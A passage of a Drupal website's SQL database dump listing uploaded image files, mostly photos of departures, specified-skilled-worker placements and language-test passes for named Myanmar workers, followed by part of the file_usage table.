(804, '02d5ed4e-00e0-46e9-8048-5921d2b292da', 'ja', 1, 'Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26).jpg', 'public://inline-images/Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26)_0.jpg', 'image/jpeg', 48633, 1, 1781857954, 1781857975),
(805, '97f3d438-a4d8-4b63-8254-1477a26ce407', 'ja', 1, 'N2 Kaigo Job Offer.jpg', 'public://inline-images/N2 Kaigo Job Offer.jpg', 'image/jpeg', 176716, 1, 1781859540, 1781859579),
(806, '69bded37-a7a1-4c91-a9d2-fdf230578555', 'ja', 1, '16-6-2026 -Nougyou.jpg', 'public://inline-images/16-6-2026 -Nougyou.jpg', 'image/jpeg', 169695, 1, 1781860097, 1781860124),
(807, '76eb4505-622f-4e13-aeb7-0ecc0f4e278b', 'ja', 1, '(14-6-2026) Su Myat Win 1.jpg', 'public://activities/(14-6-2026) Su Myat Win 1.jpg', 'image/jpeg', 141603, 1, 1781860684, 1781861026),
(808, 'db69afa8-def5-40a5-9e13-4680a60442b2', 'ja', 1, '(14-6-2026) Su Myat Win 2.jpg', 'public://inline-images/(14-6-2026) Su Myat Win 2.jpg', 'image/jpeg', 160284, 1, 1781860692, 1781861026),
(809, '0be572d0-3fc9-4b2c-bc42-e9e6898d6c5c', 'ja', 1, 'Departure 3-6-2026 (4person)1.jpg', 'public://activities/Departure 3-6-2026 (4person)1.jpg', 'image/jpeg', 206669, 1, 1781861416, 1781861523),
(810, 'ca3d7c09-57cf-4fd3-9715-ac05967a4311', 'ja', 1, '0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg', 'public://inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg', 'image/jpeg', 44368, 1, 1781861423, 1781861523),
(811, '02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f', 'ja', 1, '0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg', 'public://inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg', 'image/jpeg', 47145, 1, 1781861433, 1781861523),
(813, '592ef76f-594f-41b3-8101-bef062e3a807', 'ja', 1, '0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9.jpg', 'public://inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg', 'image/jpeg', 44555, 1, 1781861461, 1781861523),
(814, '3d109e78-f787-47e2-8256-b38e4d903f44', 'ja', 1, '0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg', 'public://inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg', 'image/jpeg', 43694, 1, 1781861467, 1781861523),
(815, '5fd80362-b637-4ad6-9d68-2f9655a557d8', 'ja', 1, '0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg', 'public://inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg', 'image/jpeg', 46502, 1, 1781861479, 1781861523),
(816, '4e7e0b81-ee40-4ce2-95e4-aa41bf482055', 'ja', 1, 'Tokutei-Hotel-Thu-Thu-Aung (20-5-2026).jpg', 'public://activities/Tokutei-Hotel-Thu-Thu-Aung (20-5-2026).jpg', 'image/jpeg', 162493, 1, 1781861870, 1781861886),
(817, '73995bdb-d96c-4914-8401-7d6cadbd79d6', 'ja', 1, 'Departure 4 person (23-4-2026)1.jpg', 'public://activities/Departure 4 person (23-4-2026)1.jpg', 'image/jpeg', 64257, 1, 1781862104, 1781862136),
(818, 'c6268691-63a4-4280-971f-f60476616ad7', 'ja', 1, 'Departure 4 person (23-4-2026) 2.jpg', 'public://inline-images/Departure 4 person (23-4-2026) 2.jpg', 'image/jpeg', 63464, 1, 1781862114, 1781862136),
(819, 'bbfc4a25-9d26-477f-a5ae-b8e118a776b3', 'ja', 1, 'Tokutei-Hotel-Win-Htet-Htet-Aung (20-5-2026).jpg', 'public://activities/Tokutei-Hotel-Win-Htet-Htet-Aung (20-5-2026).jpg', 'image/jpeg', 116786, 1, 1781862408, 1781862436),
(820, 'b62989ea-45da-4872-a495-97d3dad707f3', 'ja', 1, 'Departure (10-5-2026) 3 person -1.jpg', 'public://activities/Departure (10-5-2026) 3 person -1.jpg', 'image/jpeg', 226537, 1, 1781862714, 1781862777),
(821, 'f2947aa6-e1b8-4c14-a91e-3a2d7c90a734', 'ja', 1, 'Departure (10-5-2026) 3 person -2 .jpg', 'public://inline-images/Departure (10-5-2026) 3 person -2 .jpg', 'image/jpeg', 242189, 1, 1781862722, 1781862777),
(822, '4a808bd2-3e12-4295-a956-36d51405a3eb', 'ja', 1, 'Tokutei-Kaigo-Aye-Aye-Myint (2-5-2026).jpg', 'public://activities/Tokutei-Kaigo-Aye-Aye-Myint (2-5-2026).jpg', 'image/jpeg', 67489, 1, 1781864003, 1781864070),
(823, '12a9066d-2d55-40e5-a136-db747358582b', 'ja', 1, 'Departure (26-4-2026) May Phyoe Thu 2.jpg', 'public://inline-images/Departure (26-4-2026) May Phyoe Thu 2.jpg', 'image/jpeg', 237517, 1, 1781864776, 1781864827),
(824, '3316e771-e7d7-49bb-ad65-29995729ec49', 'ja', 1, 'Departure (26-4-2026) May Phyoe Thu 3.jpg', 'public://inline-images/Departure (26-4-2026) May Phyoe Thu 3.jpg', 'image/jpeg', 224681, 1, 1781864788, 1781864827),
(825, '3126d658-dd46-4097-ab4e-fc928efdf1d8', 'ja', 1, 'Departure (26-4-2026) May Phyoe Thu 1.jpg', 'public://activities/Departure (26-4-2026) May Phyoe Thu 1.jpg', 'image/jpeg', 232286, 1, 1781864810, 1781864827),
(826, 'e013318d-b560-4dcf-ae1d-830481164d48', 'ja', 1, 'Departure-9person_0.jpg', 'public://activities/Departure-9person_0.jpg', 'image/jpeg', 228501, 1, 1781865163, 1781865184),
(827, '401715bb-477f-4e62-9971-d3ce6774eb28', 'ja', 1, '0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a.jpg', 'public://inline-images/0-02-06-6bc017149a9c7874b366c76ecb6ef5710b9df983ea90aa778ccb8853375afe9d_22683ea0d5a_0.jpg', 'image/jpeg', 251594, 1, 1781865201, 1781865231),
(828, 'a6c82da6-0d93-4dcc-82f2-a8fa94d3e168', 'ja', 1, '0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b.jpg', 'public://inline-images/0-02-06-48cfc583aa8d8d586c04213d5c19bacd33da2460dd554ef5253d9e3aeb7c4d2d_22683ead90b_0.jpg', 'image/jpeg', 222978, 1, 1781865214, 1781865231),
(829, '3c51ce01-428b-4c5e-a6e8-e3106e251e8f', 'ja', 1, '0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a.jpg', 'public://inline-images/0-02-06-faef4433d60de7c7c609e3e09fed101395e5407311e4bbc4e0f50e58289fa580_22683ea3f7a_0.jpg', 'image/jpeg', 236348, 1, 1781865225, 1781865231),
(830, '8e973f41-b7c9-42ec-b760-4ec13ba20b55', 'ja', 1, 'Departure (22-4-2026) 9 person 1.jpg', 'public://activities/Departure (22-4-2026) 9 person 1.jpg', 'image/jpeg', 176321, 1, 1781865690, 1781865730),
(831, 'a9d567ab-8592-4871-bf00-8e175f7b3141', 'ja', 1, 'Departure (22-4-2026) 9 person 2.jpg', 'public://inline-images/Departure (22-4-2026) 9 person 2.jpg', 'image/jpeg', 236482, 1, 1781865704, 1781865730),
(832, 'c19f16b1-c33d-42a4-b025-ee14026fc86c', 'ja', 1, 'Departure (22-4-2026) 9 person 3.jpg', 'public://inline-images/Departure (22-4-2026) 9 person 3.jpg', 'image/jpeg', 254130, 1, 1781865712, 1781865730),
(833, '6c25a8b3-deae-4404-9f2b-b9aabe78dbf7', 'ja', 1, 'Departure (22-4-2026) 9 person 4.jpg', 'public://inline-images/Departure (22-4-2026) 9 person 4.jpg', 'image/jpeg', 249311, 1, 1781865721, 1781865730),
(834, '27ca7869-3333-4d3f-87d6-40b170d825c4', 'ja', 1, 'Departure (1-4-2026) Shwe Zin Phyo 1.jpg', 'public://activities/Departure (1-4-2026) Shwe Zin Phyo 1.jpg', 'image/jpeg', 239006, 1, 1781866051, 1781866082),
(835, '46cf94f9-086b-44fc-ac26-fa924bd93acc', 'ja', 1, 'Departure (1-4-2026) Shwe Zin Phyo 2.jpg', 'public://inline-images/Departure (1-4-2026) Shwe Zin Phyo 2.jpg', 'image/jpeg', 218058, 1, 1781866064, 1781866082),
(836, '238fceba-cf2d-4b11-8af8-19685b9398e3', 'ja', 1, 'Departure (1-4-2026) Shwe Zin Phyo 3.jpg', 'public://inline-images/Departure (1-4-2026) Shwe Zin Phyo 3.jpg', 'image/jpeg', 205405, 1, 1781866073, 1781866082),
(837, '5630425a-5da2-40ee-b623-7e4af59a8a60', 'ja', 1, 'Departure (29-3-2026) Win Win Thu 1.jpg', 'public://activities/Departure (29-3-2026) Win Win Thu 1.jpg', 'image/jpeg', 97867, 1, 1781866425, 1781866452),
(838, 'c8acaa1f-88f4-442a-a773-27b09b321a1d', 'ja', 1, 'Departure (29-3-2026) Win Win Thu 2.jpg', 'public://inline-images/Departure (29-3-2026) Win Win Thu 2.jpg', 'image/jpeg', 127919, 1, 1781866439, 1781866452);
INSERT INTO `file_managed` (`fid`, `uuid`, `langcode`, `uid`, `filename`, `uri`, `filemime`, `filesize`, `status`, `created`, `changed`) VALUES
(839, '61e5b1a6-5ba5-40f5-8f6f-a35a02349ded', 'ja', 1, 'Departure (29-3-2026) Win Win Thu 3.jpg', 'public://inline-images/Departure (29-3-2026) Win Win Thu 3.jpg', 'image/jpeg', 101694, 1, 1781866446, 1781866452),
(840, '95e39291-1e5e-497e-9d03-42f0a559fcd2', 'ja', 1, 'Departure (5-3-2026) Sabai Oo, Aye Pyae Pyae Lwin 1.jpg', 'public://activities/Departure (5-3-2026) Sabai Oo, Aye Pyae Pyae Lwin 1.jpg', 'image/jpeg', 205846, 1, 1781866803, 1781866853),
(841, 'cb1d5cdb-6521-4855-86ea-62b28044fb68', 'ja', 1, 'Departure (5-3-2026) Sabai OO 2.jpg', 'public://inline-images/Departure (5-3-2026) Sabai OO 2.jpg', 'image/jpeg', 196789, 1, 1781866815, 1781866853),
(842, 'ce4dc739-1531-43b5-9395-dbff9148d993', 'ja', 1, 'Departure (5-3-2026) Aye Pyae Pyae Lwin 3.jpg', 'public://inline-images/Departure (5-3-2026) Aye Pyae Pyae Lwin 3.jpg', 'image/jpeg', 195315, 1, 1781866823, 1781866853),
(843, 'b6a72406-c934-45a0-8369-77db99b97f07', 'ja', 1, 'Derparture _TEM-1.jpg', 'public://activities/Derparture _TEM-1.jpg', 'image/jpeg', 153629, 1, 1781867511, 1781867563),
(844, '628dca1b-6798-4314-9473-97858d65845a', 'ja', 1, 'Departure-TEM-2.jpg', 'public://inline-images/Departure-TEM-2.jpg', 'image/jpeg', 192956, 1, 1781867523, 1781867563),
(845, '987dbd4c-8aaa-4956-a18b-807e73155bc2', 'ja', 1, 'Departure-TEM-3.jpg', 'public://inline-images/Departure-TEM-3.jpg', 'image/jpeg', 212821, 1, 1781867530, 1781867563),
(846, 'abcbcc9b-b3bf-4b37-887d-6967a7b342c1', 'ja', 1, 'Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26).jpg', 'public://activities/Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26).jpg', 'image/jpeg', 48633, 1, 1781868023, 1781868026),
(847, '7cbffe9c-56e0-42cd-8c5a-f51589c98d01', 'ja', 1, 'Tokutei-Gaishoku-Toe-Toe-Hlaing (3-2-2026).jpg', 'public://activities/Tokutei-Gaishoku-Toe-Toe-Hlaing (3-2-2026).jpg', 'image/jpeg', 47769, 1, 1781868117, 1781868119),
(848, '86c64a40-faaa-4260-8609-7e26610cecd1', 'ja', 1, 'tokutei-Kaigo-Phyo-Thiri-Htet(2-5-2026).jpg', 'public://activities/tokutei-Kaigo-Phyo-Thiri-Htet(2-5-2026).jpg', 'image/jpeg', 72111, 1, 1781868194, 1781868217),
(849, '5cdf82d4-4d7d-4d65-86c4-373a7333b070', 'ja', 1, 'Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26)_0.jpg', 'public://activities/Tokutei-gaishoku-Myat-Thandar-Kyaw(3-2-26)_0.jpg', 'image/jpeg', 48633, 1, 1781870002, 1781870011),
(850, '74b1a9fa-948f-4eb3-9dba-ec00b368fb26', 'ja', 1, 'Tokutei-Gaishoku-Hsu-Wyne-Wyne-Pyae (3-2-2026).jpg', 'public://activities/Tokutei-Gaishoku-Hsu-Wyne-Wyne-Pyae (3-2-2026).jpg', 'image/jpeg', 50013, 1, 1781870178, 1781870184),
(851, '6a0dc404-3e62-405e-a727-620f2a584d7d', 'ja', 1, 'JLPT N3 passed -Su-Su-San (30-1-2026).jpg', 'public://activities/JLPT N3 passed -Su-Su-San (30-1-2026).jpg', 'image/jpeg', 25214, 1, 1781870369, 1781870377),
(852, 'b7a927c9-497a-471b-ad10-3f74fed97988', 'ja', 1, 'JLPT N3 passed-Aye-Thazin (30-1-2026).jpg', 'public://activities/JLPT N3 passed-Aye-Thazin (30-1-2026).jpg', 'image/jpeg', 8009, 1, 1781870591, 1781870596),
(853, '7d98d147-0e2a-4e34-8a07-6c2bc90e3321', 'ja', 1, 'JLPT N3 passed -Aye-Pwint-Phyu (30-1-2026).jpg', 'public://activities/JLPT N3 passed -Aye-Pwint-Phyu (30-1-2026).jpg', 'image/jpeg', 49632, 1, 1781870740, 1781870746),
(854, 'b9800ee3-971d-4a34-a815-ce5811aa24f7', 'ja', 1, 'Departure (26-1-2026) 1.jpg', 'public://activities/Departure (26-1-2026) 1.jpg', 'image/jpeg', 153631, 1, 1781871004, 1781871015),
(855, '756cc1a2-2000-4b64-8592-ee4ca7402f8f', 'ja', 1, 'Tokutei-Gaishoku-Hnin-Wathan (24-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Hnin-Wathan (24-1-2026).jpg', 'image/jpeg', 54202, 1, 1781871241, 1781871245),
(856, 'a7063169-e09a-4789-8e05-57415c06648f', 'ja', 1, 'Tokutei-Gaishoku-Yadana-Lwin (24-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Yadana-Lwin (24-1-2026).jpg', 'image/jpeg', 63777, 1, 1781871426, 1781871431),
(857, '2ead4a70-c16b-422d-a6c8-75102567cafb', 'ja', 1, 'Tokutei-Gaishoku-Khit-Yu-Ya-Soe(24-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Khit-Yu-Ya-Soe(24-1-2026).jpg', 'image/jpeg', 64662, 1, 1781927914, 1781927919),
(858, 'ff8b145d-50dc-48bd-8c60-926a19c0536a', 'ja', 1, 'Tokutei-Gaishoku-Thet-Mon-Soe (22-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Thet-Mon-Soe (22-1-2026).jpg', 'image/jpeg', 60611, 1, 1781930051, 1781930057),
(859, 'b7f8af1f-964b-4618-9fe0-88cc34d7ba43', 'ja', 1, 'Tokutei-Gaishoku-Wai-Mon-Thant (22-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Wai-Mon-Thant (22-1-2026).jpg', 'image/jpeg', 61527, 1, 1781932105, 1781932120),
(860, 'cb0b0454-79b9-4c53-80c3-b228cdde1b80', 'ja', 1, 'Tokutei-Gaisgoku-Ei-Ei-Khet (22-1-2026).jpg', 'public://activities/Tokutei-Gaisgoku-Ei-Ei-Khet (22-1-2026).jpg', 'image/jpeg', 60688, 1, 1781932347, 1781932388),
(861, 'd61882d8-4b04-4976-8625-97759fa6e0e8', 'ja', 1, 'Tokutei-Gaishoku-Sabai-Oo (21-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Sabai-Oo (21-1-2026).jpg', 'image/jpeg', 63434, 1, 1781932523, 1781932531),
(862, '432cd81e-7674-4d7a-83da-8adaa9687a16', 'ja', 1, 'Tokutei-Gaishoku-Thwel-Thwel-Aye (21-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Thwel-Thwel-Aye (21-1-2026).jpg', 'image/jpeg', 68796, 1, 1781933522, 1781933525),
(863, '9c51e5b0-2a1a-44cf-9fed-c89bd043d8d3', 'ja', 1, 'Tokutei-Gaishoku-Ei-Ei-Phyoe (21-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Ei-Ei-Phyoe (21-1-2026).jpg', 'image/jpeg', 64924, 1, 1781937173, 1781937183),
(864, 'c03346ad-a095-40e9-9796-5292aaf164b8', 'ja', 1, 'Tokutei-Gaishoku-Win-Win-Thu (20-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Win-Win-Thu (20-1-2026).jpg', 'image/jpeg', 69478, 1, 1781937577, 1781937623),
(865, 'ebef8555-77e4-4f53-88fb-12090745f332', 'ja', 1, 'Tokutei-Gaishoku-Tun-Eaindra-Moe(19-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Tun-Eaindra-Moe(19-1-2026).jpg', 'image/jpeg', 65401, 1, 1781938099, 1781938112),
(866, 'e6e79c41-5263-4a6c-b2d4-cddecc8bba5c', 'ja', 1, 'Tokutei-Gaishoku-Mai-Thandar-Naing(19-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Mai-Thandar-Naing(19-1-2026).jpg', 'image/jpeg', 62764, 1, 1781938534, 1781938542),
(867, 'a4ff3fe1-7372-4f33-9ae2-cb7184553347', 'ja', 1, 'Tokutei-Gaishoku-Ei-Zin-Htwe (19-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Ei-Zin-Htwe (19-1-2026).jpg', 'image/jpeg', 119084, 1, 1781938828, 1781938836),
(868, 'd4d98999-ada0-4d56-ad9a-0a95c5e5d3e8', 'ja', 1, 'Tokutei-Gaishoku-Htay-Htay-Khaing (19-1-2026).jpg', 'public://activities/Tokutei-Gaishoku-Htay-Htay-Khaing (19-1-2026).jpg', 'image/jpeg', 94455, 1, 1781939016, 1781939019),
(877, 'd81adba1-1fdf-40fc-b9d5-dfb7c505fe46', 'ja', 2, 'world-map_0.gif', 'public://activities/world-map_0.gif', 'image/gif', 127690, 1, 1786712675, 1786712680),
(878, '08913c64-ad59-40ec-b77a-5d5d2f590615', 'ja', 2, 'world-map_1.gif', 'public://activities/world-map_1.gif', 'image/gif', 127690, 1, 1786715965, 1786715974),
(879, '1aa6c267-2706-4b29-8db0-13a00d52402b', 'ja', 2, 'world-map.gif', 'public://language-center/world-map.gif', 'image/gif', 127690, 1, 1787751518, 1787751526),
(880, '0e8c3b8b-9fdf-41e0-87f4-df49b3bfafae', 'ja', 2, 'world-map_0.gif', 'public://language-center/world-map_0.gif', 'image/gif', 127690, 1, 1787752393, 1787752396),
(881, 'f1b5dc3d-4433-4fd2-940c-53e837032cb9', 'ja', 2, 'world-map_1.gif', 'public://language-center/world-map_1.gif', 'image/gif', 127690, 1, 1787923034, 1787923046);

-- --------------------------------------------------------

--
-- Table structure for table `file_usage`
--

CREATE TABLE `file_usage` (
  `fid` int UNSIGNED NOT NULL COMMENT 'File ID.',
  `module` varchar(50) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The name of the module that is using the file.',
  `type` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The name of the object type in which the file is used.',
  `id` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '0' COMMENT 'The primary key of the object using the file.',
  `count` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The number of times this file is used by this object.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Track where a file is used.';

--
-- Dumping data for table `file_usage`
--

INSERT INTO `file_usage` (`fid`, `module`, `type`, `id`, `count`) VALUES
(3, 'editor', 'block_content', '1', 1),
(5, 'editor', 'block_content', '1', 1),
(5, 'editor', 'block_content', '16', 1),
(5, 'editor', 'block_content', '17', 1),
(5, 'editor', 'block_content', '18', 1),
(5, 'editor', 'block_content', '19', 1),
(5, 'editor', 'block_content', '20', 1),
(5, 'editor', 'block_content', '21', 1),
(6, 'editor', 'node', '1', 17),
(8, 'editor', 'block_content', '3', 1),
(9, 'editor', 'block_content', '2', 1),
(9, 'editor', 'block_content', '22', 1),
(10, 'editor', 'node', '6', 9),
(11, 'file', 'node', '6', 16),
(12, 'file', 'node', '7', 19),
(13, 'file', 'node', '8', 22),
(14, 'editor', 'node', '9', 9),
(15, 'file', 'node', '9', 1),
(16, 'file', 'node', '9', 15),
(17, 'editor', 'block_content', '5', 1),
(22, 'editor', 'node', '17', 7),
(24, 'editor', 'node', '17', 7),
(28, 'editor', 'node', '17', 7),
(29, 'file', 'node', '17', 16),
(30, 'file', 'node', '19', 10),
(31, 'editor', 'node', '19', 5),
(32, 'file', 'node', '20', 10),
(33, 'editor', 'node', '20', 5),
(37, 'file', 'node', '21', 1),
(38, 'file', 'node', '22', 1),
(39, 'editor', 'node', '1', 4),
(40, 'editor', 'node', '1', 1),
(41, 'editor', 'block_content', '16', 1),
(42, 'editor', 'block_content', '17', 1),
(43, 'editor', 'block_content', '18', 1),
(44, 'editor', 'block_content', '19', 1),
(45, 'editor', 'block_content', '20', 1),
(46, 'editor', 'block_content', '21', 1),
(48, 'editor', 'node', '23', 9),
(49, 'editor', 'node', '23', 10),
(50, 'editor', 'node', '23', 10),
(51, 'editor', 'node', '23', 10),
(52, 'editor', 'node', '23', 10),
(53, 'editor', 'node', '23', 10),
(54, 'editor', 'node', '23', 10),
(55, 'editor', 'node', '23', 10),
(56, 'editor', 'node', '23', 8),
(57, 'editor', 'node', '23', 8),
(58, 'editor', 'node', '23', 8),
(59, 'editor', 'node', '23', 8),
(60, 'editor', 'node', '23', 8),
(61, 'editor', 'node', '23', 8),
(62, 'editor', 'node', '23', 8),
(63, 'editor', 'node', '23', 8),
(64, 'editor', 'node', '23', 8),
(65, 'editor', 'node', '23', 8),
(66, 'editor', 'node', '23', 8),
(67, 'editor', 'node', '23', 8),
(68, 'editor', 'node', '23', 8),
(69, 'editor', 'node', '23', 8),
(70, 'editor', 'node', '23', 8),
(71, 'editor', 'node', '23', 8),
(72, 'editor', 'node', '23', 8),
(73, 'editor', 'node', '23', 8),
(74, 'editor', 'node', '23', 8),
(75, 'editor', 'node', '23', 8),
(76, 'editor', 'node', '23', 8),
(77, 'editor', 'node', '23', 8),
(78, 'editor', 'node', '28', 4),
(80, 'file', 'node', '28', 1),
(81, 'file', 'node', '28', 6),
(82, 'editor', 'node', '29', 3),
(83, 'file', 'node', '29', 6),
(87, 'editor', 'node', '25', 2),
(88, 'editor', 'node', '25', 2),
(89, 'editor', 'node', '25', 2),
(91, 'editor', 'node', '27', 4),
(92, 'editor', 'node', '27', 3),
(93, 'editor', 'node', '27', 1),
(94, 'editor', 'node', '24', 6),
(95, 'editor', 'node', '24', 5),
(96, 'editor', 'node', '24', 5),
(106, 'editor', 'node', '27', 1),
(107, 'editor', 'node', '27', 1),
(108, 'editor', 'node', '27', 1),
(109, 'editor', 'node', '27', 1),
(110, 'editor', 'node', '27', 1),
(111, 'editor', 'node', '27', 1),
(112, 'editor', 'node', '27', 1),
(113, 'editor', 'node', '27', 2),
(114, 'editor', 'node', '27', 2),
(115, 'editor', 'node', '27', 2),
(116, 'editor', 'node', '27', 2),
(117, 'editor', 'node', '27', 2),
(118, 'editor', 'node', '27', 2),
(119, 'editor', 'node', '27', 2),
(121, 'editor', 'node', '23', 5),
(122, 'editor', 'node', '23', 9),
(123, 'editor', 'node', '23', 6),
(124, 'editor', 'node', '23', 6),
(125, 'editor', 'node', '23', 6),
(126, 'editor', 'node', '23', 8),
(127, 'editor', 'node', '23', 9),
(128, 'editor', 'node', '23', 6),
(129, 'editor', 'node', '23', 8),
(130, 'editor', 'node', '23', 8),
(131, 'editor', 'node', '23', 5),
(132, 'editor', 'node', '23', 5),
(133, 'editor', 'node', '23', 5),
(134, 'editor', 'node', '23', 8),
(135, 'editor', 'node', '23', 8),
(136, 'editor', 'node', '23', 8),
(137, 'editor', 'node', '23', 8),
(138, 'editor', 'node', '23', 8),
(139, 'editor', 'node', '23', 8),
(140, 'editor', 'node', '23', 7),
(141, 'editor', 'node', '23', 8),
(142, 'editor', 'node', '23', 8),
(143, 'editor', 'node', '23', 8),
(144, 'editor', 'node', '23', 8),
(145, 'editor', 'node', '23', 8),
(146, 'editor', 'node', '23', 8),
(147, 'editor', 'node', '23', 8),
(148, 'editor', 'node', '23', 8),
(149, 'editor', 'node', '23', 3),
(150, 'editor', 'node', '23', 3),
(151, 'editor', 'node', '23', 3),
(152, 'editor', 'node', '23', 3),
(153, 'editor', 'node', '23', 3),
(154, 'editor', 'node', '23', 3),
(155, 'editor', 'node', '23', 3),
(156, 'editor', 'node', '23', 3),
(157, 'editor', 'node', '23', 3),
(158, 'editor', 'node', '23', 3),
(159, 'editor', 'node', '23', 4),
(160, 'editor', 'node', '23', 7),
(161, 'editor', 'node', '23', 3),
(162, 'editor', 'node', '23', 7),
(163, 'editor', 'node', '23', 4),
(164, 'editor', 'node', '23', 4),
(165, 'editor', 'node', '23', 4),
(166, 'editor', 'node', '23', 6),
(167, 'editor', 'node', '23', 4),
(168, 'editor', 'node', '23', 6),
(169, 'editor', 'node', '23', 6),
(170, 'editor', 'node', '23', 4),
(171, 'editor', 'node', '23', 4),
(172, 'editor', 'node', '23', 4),
(173, 'editor', 'node', '23', 7),
(174, 'editor', 'node', '23', 7),
(175, 'editor', 'node', '23', 7),
(176, 'editor', 'node', '23', 7),
(177, 'editor', 'node', '23', 7),
(178, 'editor', 'node', '23', 7),
(179, 'editor', 'node', '23', 6),
(180, 'editor', 'node', '23', 7),
(181, 'editor', 'node', '23', 7),
(182, 'editor', 'node', '23', 7),
(183, 'editor', 'node', '23', 7),
(184, 'editor', 'node', '23', 7),
(185, 'editor', 'node', '23', 7),
(186, 'editor', 'node', '23', 7),
(187, 'editor', 'node', '23', 7),
(188, 'editor', 'node', '23', 2),
(189, 'editor', 'node', '23', 2),
(190, 'editor', 'node', '23', 2),
(191, 'editor', 'node', '23', 2),
(192, 'editor', 'node', '23', 2),
(193, 'editor', 'node', '23', 2),
(194, 'editor', 'node', '23', 2),
(195, 'editor', 'node', '23', 2),
(196, 'editor', 'node', '23', 2),
(197, 'editor', 'node', '23', 2),
(198, 'editor', 'node', '23', 3),
(199, 'editor', 'node', '23', 7),
(200, 'editor', 'node', '23', 3),
(201, 'editor', 'node', '23', 7),
(202, 'editor', 'node', '23', 4),
(203, 'editor', 'node', '23', 4),
(204, 'editor', 'node', '23', 4),
(205, 'editor', 'node', '23', 6),
(206, 'editor', 'node', '23', 4),
(207, 'editor', 'node', '23', 6),
(208, 'editor', 'node', '23', 6),
(209, 'editor', 'node', '23', 4),
(210, 'editor', 'node', '23', 4),
(211, 'editor', 'node', '23', 4),
(212, 'editor', 'node', '23', 7),
(213, 'editor', 'node', '23', 7),
(214, 'editor', 'node', '23', 7),
(215, 'editor', 'node', '23', 7),
(216, 'editor', 'node', '23', 7),
(217, 'editor', 'node', '23', 7),
(218, 'editor', 'node', '23', 6),
(219, 'editor', 'node', '23', 7),
(220, 'editor', 'node', '23', 7),
(221, 'editor', 'node', '23', 7),
(222, 'editor', 'node', '23', 7),
(223, 'editor', 'node', '23', 7),
(224, 'editor', 'node', '23', 7),
(225, 'editor', 'node', '23', 7),
(226, 'editor', 'node', '23', 7),
(227, 'editor', 'node', '23', 2),
(228, 'editor', 'node', '23', 2),
(229, 'editor', 'node', '23', 2),
(230, 'editor', 'node', '23', 2),
(231, 'editor', 'node', '23', 2),
(232, 'editor', 'node', '23', 2),
(233, 'editor', 'node', '23', 2),
(234, 'editor', 'node', '23', 2),
(235, 'editor', 'node', '23', 2),
(237, 'editor', 'node', '23', 2),
(238, 'editor', 'node', '23', 3),
(241, 'editor', 'node', '23', 6),
(242, 'editor', 'node', '23', 5),
(243, 'editor', 'node', '23', 6),
(244, 'editor', 'node', '23', 6),
(245, 'editor', 'node', '23', 5),
(246, 'editor', 'node', '23', 6),
(247, 'editor', 'node', '23', 6),
(248, 'editor', 'node', '23', 5),
(249, 'editor', 'node', '23', 6),
(250, 'editor', 'node', '27', 1),
(251, 'editor', 'node', '27', 1),
(252, 'editor', 'node', '27', 1),
(253, 'editor', 'node', '27', 1),
(254, 'editor', 'node', '27', 1),
(255, 'editor', 'node', '27', 1),
(256, 'editor', 'node', '27', 1),
(257, 'editor', 'node', '27', 1),
(258, 'editor', 'node', '27', 1),
(259, 'editor', 'node', '27', 1),
(260, 'editor', 'node', '27', 1),
(261, 'editor', 'node', '27', 1),
(262, 'editor', 'node', '27', 1),
(263, 'editor', 'node', '27', 1),
(264, 'editor', 'node', '24', 5),
(265, 'editor', 'node', '24', 4),
(266, 'editor', 'node', '24', 4),
(267, 'editor', 'node', '25', 1),
(268, 'editor', 'node', '25', 1),
(269, 'editor', 'node', '25', 1),
(271, 'editor', 'node', '25', 2),
(272, 'editor', 'node', '25', 2),
(273, 'editor', 'node', '25', 2),
(274, 'editor', 'node', '25', 2),
(275, 'editor', 'node', '25', 1),
(276, 'editor', 'node', '25', 1),
(277, 'editor', 'node', '23', 4),
(278, 'editor', 'node', '23', 4),
